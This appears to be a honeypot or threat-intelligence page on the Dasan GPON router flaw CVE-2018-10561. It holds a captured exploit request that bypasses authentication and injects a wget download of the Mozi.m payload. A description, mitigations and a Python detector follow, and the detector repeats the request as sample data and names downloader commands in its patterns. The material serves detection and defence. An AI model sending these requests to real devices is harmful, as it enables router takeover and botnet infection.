Attack information

Tag
CVE-2018-10561
Date
2025-12-23
Client IP
103.199.202.161
Client GEO
India
Vendor
Dasan
Product
GPON home routers
RAW request
POST /GponForm/diag_Form?images%2F HTTP/1.0
User-Agent: Hello, World
Host: █████████
Content-Type: application/octet-stream
Content-Length: 118
X-Forwarded-For: ███████████████
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://███████████████:55257/Mozi.m+-O+->/tmp/gpon8
Description

CVE-2018-10561 is a significant security vulnerability affecting Dasan GPON home routers, which are widely used for providing fiber-optic internet. The vulnerability allows remote attackers to bypass the router's authentication mechanism by simply appending the string "?images" to any URL within the device's web interface. This bypass grants attackers full management access to the device without requiring any credentials.

The vulnerability is particularly critical as it affects over one million routers globally, making it a prime target for cybercriminals. Once an attacker gains access, they can manipulate the router's settings, redirect users to malicious websites, install malware, and even eavesdrop on network traffic. The compromised routers can also be used as part of a botnet for launching distributed denial-of-service (DDoS) attacks, similar to the infamous Mirai or Satori botnets.

The issue is compounded when combined with another vulnerability, CVE-2018-10562, which allows command injection. Together, these vulnerabilities let unauthenticated attackers take complete control of the device and potentially the entire network. The routers save ping results in a temporary file and return them to the user on revisiting a specific URL, making it easy for attackers to execute commands and retrieve their output. The captured request above shows exactly this chain: the "?images" suffix on /GponForm/diag_Form bypasses authentication, and a shell command injected into the dest_host parameter of the ping diagnostic downloads a file named Mozi.m into /tmp.

Given the widespread use of these routers and the potential for severe security and privacy breaches, CVE-2018-10561 has been included in CISA's Known Exploited Vulnerabilities Catalog. The vulnerability poses a high risk to users, especially since the affected devices are often end-of-life and may not receive security updates.

Mitigations
  1. Disconnect Affected Devices: Since the impacted routers are end-of-life, it is recommended to disconnect them from the network to prevent unauthorized access.
  2. Replace with Secure Alternatives: Consider replacing the vulnerable routers with newer models that receive regular security updates and patches.
  3. Network Monitoring: Implement network monitoring to detect any unusual activities that may indicate exploitation attempts.
  4. Firewall and Access Controls: Use firewalls and strict access controls to limit exposure to the internet and prevent unauthorized access.
  5. Educate Users: Inform users about the risks associated with using outdated and vulnerable devices, and encourage them to upgrade to more secure options.
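The following detector illustrates mitigation 3 (network monitoring) against the exact pattern in the captured request: the "?images" authentication-bypass suffix on a GPON web path, and shell metacharacters or a download command inside the dest_host ping parameter. It is an added example written for this page, not code from the honeypot operator or from Dasan; the sample request and access-log lines are constructed (the redacted hosts are replaced with TEST-NET addresses), and the Common Log Format regex and the assumption that a GPON router never legitimately carries "?images/" in a query string are the author's.

```python
"""Flag CVE-2018-10561 (auth bypass) and CVE-2018-10562 (command injection)
attempts in captured HTTP requests and web-server access logs.
Added example for this page; sample data below is constructed."""
import re
from urllib.parse import parse_qs, unquote

# '?images' (optionally followed by '/') appended to a GPON web path skips
# authentication. Assumption: no legitimate request to these routers looks like this.
BYPASS_RE = re.compile(r"\?images(?:/|$)", re.IGNORECASE)
# Shell metacharacters that have no business in a ping target.
SHELL_META_RE = re.compile(r"[;`|&]|\$\(")
# Typical downloader commands seen in injected ping targets.
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp)\b")
# Common Log Format: ip ident user [ts] "METHOD target PROTO" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_raw_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()


def analyze_request(raw: str) -> list:
    """Return finding strings for one captured request; empty list if clean."""
    method, target, headers, body = parse_raw_request(raw)
    findings = []
    decoded_target = unquote(target)          # '?images%2F' -> '?images/'
    if decoded_target.startswith("/GponForm/") and BYPASS_RE.search(decoded_target):
        findings.append("CVE-2018-10561 auth bypass: '?images' appended to "
                        + decoded_target.split("?")[0])
    # parse_qs turns '+' into spaces, so the injected command reads as typed.
    params = parse_qs(body, keep_blank_values=True)
    dest_host = params.get("dest_host", [""])[0]
    if dest_host and SHELL_META_RE.search(dest_host):
        findings.append("CVE-2018-10562 command injection: shell metacharacters "
                        "in dest_host=" + dest_host)
    if DOWNLOADER_RE.search(dest_host):
        findings.append("payload download attempt in dest_host")
    return findings


def scan_access_log(lines) -> list:
    """Return (client_ip, decoded_target) for log entries carrying the bypass suffix.
    Access logs lack the POST body, so only the auth bypass is visible here."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        target = unquote(m.group("target"))
        if BYPASS_RE.search(target):
            hits.append((m.group("ip"), target))
    return hits


# Constructed sample modelled on the captured request above (hosts replaced).
SAMPLE_ATTACK_REQUEST = "\n".join([
    "POST /GponForm/diag_Form?images%2F HTTP/1.0",
    "User-Agent: Hello, World",
    "Host: 192.0.2.1",
    "Content-Type: application/octet-stream",
    "Connection: close",
    "",
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;"
    "wget+http://203.0.113.10:55257/Mozi.m+-O+->/tmp/gpon8",
])
SAMPLE_BENIGN_REQUEST = "\n".join([
    "POST /GponForm/diag_Form HTTP/1.0",
    "Host: 192.0.2.1",
    "",
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=8.8.8.8",
])
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [23/Dec/2025:10:15:01 +0000] "POST /GponForm/diag_Form?images%2F HTTP/1.0" 200 512',
    '198.51.100.7 - - [23/Dec/2025:10:15:02 +0000] "GET /images/logo.png HTTP/1.1" 200 1024',
    '203.0.113.5 - - [23/Dec/2025:10:15:03 +0000] "GET /menu.html?images/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in analyze_request(SAMPLE_ATTACK_REQUEST):
        print("ALERT:", f)
    print("benign request findings:", analyze_request(SAMPLE_BENIGN_REQUEST))
    for ip, target in scan_access_log(SAMPLE_ACCESS_LOG):
        print("ALERT (access log):", ip, target)
```

Run against a proxy or honeypot capture the request-level checks fire on both the bypass and the injected ping target; against ordinary router access logs only the bypass suffix is visible, which is still enough to spot scanning for this bug. Tune BYPASS_RE if the same sensor also covers hosts where "?images" is a legitimate query parameter.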